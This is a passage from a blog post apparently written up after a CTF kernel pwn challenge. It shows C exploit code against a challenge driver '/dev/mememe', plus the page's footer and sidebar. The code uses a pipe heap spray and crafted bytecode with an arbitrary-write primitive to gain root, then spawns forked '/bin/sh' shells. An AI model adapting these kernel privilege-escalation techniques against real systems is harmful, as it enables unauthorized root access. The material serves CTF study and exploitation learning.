class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/msg.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/syscall.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;threads.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> TTY_MAGIC 0x200005401</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> KERNCALL __attribute__((regparm(3)))</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SUCCESS GREEN <span class="string">&quot;SUCCESS&quot;</span> END</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">shell_noerr</span><span class="params">()</span> &#123;</span><br><span class="line">  <span class="keyword">if</span> (!getuid()) &#123;</span><br><span class="line">    success(<span class="string">&quot;[=============================================]\n&quot;</span>);</span><br><span class="line">    success(<span class="string">&quot;[===================&quot;</span> SUCCESS <span class="string">&quot;===================]\n&quot;</span>);</span><br><span class="line">    success(<span class="string">&quot;[=============================================]\n&quot;</span>);</span><br><span class="line">    system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">bind_cpu</span><span class="params">(<span class="type">int</span> core)</span> &#123;</span><br><span class="line">  <span class="type">cpu_set_t</span> cpu_set;</span><br><span class="line"></span><br><span class="line">  CPU_ZERO(&amp;cpu_set);</span><br><span class="line">  CPU_SET(core, &amp;cpu_set);</span><br><span class="line">  sched_setaffinity(getpid(), <span class="keyword">sizeof</span>(cpu_set), &amp;cpu_set);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">uint64_t</span> page_size;</span><br><span class="line"><span class="type">void</span> __attribute__((constructor)) init() &#123;</span><br><span class="line">  bind_cpu(<span class="number">0</span>);</span><br><span class="line">  page_size = sysconf(_SC_PAGESIZE);</span><br><span class="line">  info(<span class="string">&quot;page size: %#lx\n&quot;</span>, page_size);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">const</span> <span class="type">char</span> *device = <span class="string">&quot;/dev/mememe&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// rsp &gt; 0 || rsp &lt; 30</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* id</span></span><br><span class="line"><span class="comment"> * imm = id + 2</span></span><br><span class="line"><span class="comment"> * 14:</span></span><br><span class="line"><span class="comment"> *  xchg stack[rsp], stack[rsp-1]</span></span><br><span class="line"><span class="comment"> * 15:</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 16:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &lt;&lt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 17:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &gt;&gt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 18:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &amp; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 0x13:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] | stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 0x14:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] == stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 0x15:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] != stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 0x16:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &lt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 0x17:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] &gt; stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 13:</span></span><br><span class="line"><span class="comment"> *  stack[rsp + 1] = stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp++</span></span><br><span class="line"><span class="comment"> * 12:</span></span><br><span class="line"><span class="comment"> *  page[imm] = stack[rsp] // ??? AAW</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 11:</span></span><br><span class="line"><span class="comment"> *  stack[rsp + 1] = page[imm]</span></span><br><span class="line"><span class="comment"> *  rsp++</span></span><br><span class="line"><span class="comment"> * 10:</span></span><br><span class="line"><span class="comment"> *  stack[rsp + 1] = imm</span></span><br><span class="line"><span class="comment"> *  rsp++</span></span><br><span class="line"><span class="comment"> * 8:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] ^ stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 0:</span></span><br><span class="line"><span class="comment"> *  nop</span></span><br><span class="line"><span class="comment"> * 4:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] + stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 5:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] - stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 6:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] * stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> * 7:</span></span><br><span class="line"><span class="comment"> *  stack[rsp - 1] = stack[rsp - 1] / stack[rsp]</span></span><br><span class="line"><span class="comment"> *  rsp--</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  stack[rsp] = 0</span></span><br><span class="line"><span class="comment"> *  rsp &lt;==&gt;</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  NEXT:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  v14 = (idx + 2) + page[v14] + 1</span></span><br><span class="line"><span class="comment"> *  idx = (idx + 2) + page[v14]</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  kmap = stack[rsp]</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  00_00_0000_0000</span></span><br><span class="line"><span class="comment"> *  id_nx_imm</span></span><br><span class="line"><span class="comment"> * eg:</span></span><br><span class="line"><span class="comment"> *  11_00_FFFF_FFFF</span></span><br><span class="line"><span class="comment"> * size: 0x6</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">insn</span> &#123;</span></span><br><span class="line">  <span class="type">uint8_t</span> idx;</span><br><span class="line">  <span class="type">uint8_t</span> next;</span><br><span class="line">  <span class="type">uint16_t</span> imm1;</span><br><span class="line">  <span class="type">uint16_t</span> imm2;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// <span class="doctag">NOTE:</span> Linux Kernel exploit template</span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">  <span class="comment">// save_stat();</span></span><br><span class="line">  <span class="comment">//  INFO: Step 0x01: spray pipe</span></span><br><span class="line">  step(<span class="string">&quot;spray pipe&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_NUMS 0x100</span></span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> pipe_fds[PIPE_NUMS][<span class="number">2</span>];</span><br><span class="line">  <span class="type">char</span> *pipe_buf[<span class="number">0x1000</span>];</span><br><span class="line">  <span class="type">char</span> *pipe_recv[<span class="number">0x1000</span>];</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUMS; ++i) &#123;</span><br><span class="line">    check(pipe(pipe_fds[i]));</span><br><span class="line">    <span class="built_in">memcpy</span>(pipe_buf, <span class="string">&quot;find__me&quot;</span>, <span class="number">0x8</span>);</span><br><span class="line">    check(write(pipe_fds[i][<span class="number">1</span>], pipe_buf, <span class="number">0x1000</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  success(<span class="string">&quot;spray pipe successfully\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUMS; i += <span class="number">2</span>) &#123;</span><br><span class="line">    close(pipe_fds[i][<span class="number">0</span>]);</span><br><span class="line">    close(pipe_fds[i][<span class="number">1</span>]);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// INFO: Step 0x02: open device</span></span><br><span class="line">  step(<span class="string">&quot;open device&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> fd = check(open(device, <span class="number">2</span>));</span><br><span class="line"></span><br><span class="line">  success(<span class="string">&quot;device open successfully\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">insn</span> <span class="title">insns</span>[] =</span> &#123;</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x1008</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">20</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x100c</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">44</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x1010</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">68</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x1014</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">92</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x1018</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">116</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x101c</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">140</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x1020</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">164</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x1024</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">188</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">10</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x0</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line">      &#123;.idx = <span class="number">12</span>, .next = <span class="number">4</span>, .imm1 = <span class="number">0x28</span>, .imm2 = <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line">  &#125;;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// INFO: Step 0x03: open device</span></span><br><span class="line">  step(<span class="string">&quot;close pipe&quot;</span>);</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">1</span>; i &lt; PIPE_NUMS; i += <span class="number">2</span>) &#123;</span><br><span class="line">    close(pipe_fds[i][<span class="number">0</span>]);</span><br><span class="line">    close(pipe_fds[i][<span class="number">1</span>]);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// INFO: Step 0x04: fork</span></span><br><span class="line">  step(<span class="string">&quot;fork&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">0x30</span>; ++i) &#123;</span><br><span class="line">    setuid(<span class="number">1000</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">0x200</span>; ++i) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!fork()) &#123;</span><br><span class="line">      <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">        shell_noerr();</span><br><span class="line">        sleep(<span class="number">0x1</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  info(<span class="string">&quot;fork\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">  write(fd, insns, <span class="keyword">sizeof</span>(insns));</span><br><span class="line">  check(ioctl(fd, <span class="number">0x7601</span>));</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    sleep(<span class="number">0x100</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/kernel/" rel="tag"># kernel</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/05/21/pwncollege-ker/" rel="prev" title="[pwn.college] Kernel Exploitation 解题记录">
      <i class="fa fa-chevron-left"></i> [pwn.college] Kernel Exploitation 解题记录
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%98%B2%E6%8A%A4%E6%A3%80%E6%9F%A5"><span class="nav-number">1.</span> <span class="nav-text">防护检查</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%80%86%E5%90%91%E5%88%86%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">逆向分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">3.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="nav-number">3.1.</span> <span class="nav-text">利用思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B5%9B%E6%97%B6%E7%AD%96%E7%95%A5"><span class="nav-number">3.2.</span> <span class="nav-text">赛时策略</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%B9%E8%BF%9B%E7%AD%96%E7%95%A5"><span class="nav-number">3.3.</span> <span class="nav-text">改进策略</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B5%9B%E6%97%B6Exp"><span class="nav-number">4.</span> <span class="nav-text">赛时Exp</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">NazrinDuck</p>
  <div class="site-description" itemprop="description">Fâtih'in İstanbul'u fethettiği yaştasın!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">NazrinDuck</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
